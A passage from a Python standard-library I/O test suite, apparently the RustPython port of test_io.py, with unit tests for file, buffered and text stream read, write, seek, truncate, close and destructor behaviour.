class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(support.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
@unittest.skip("TODO: RUSTPYTHON, specifics of operation order in close()")
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(support.TESTFN.encode('utf-8')))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
# TODO: RUSTPYTHON, cyclic gc
@unittest.expectedFailure
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
@unittest.skip("TODO: RUSTPYTHON, pyio version depends on memoryview.cast()")
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
# TODO: RUSTPYTHON, sys.unraisablehook
@unittest.expectedFailure
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
@unittest.skip("TODO: RUSTPYTHON, specifics of operation order in close()")
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
    def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
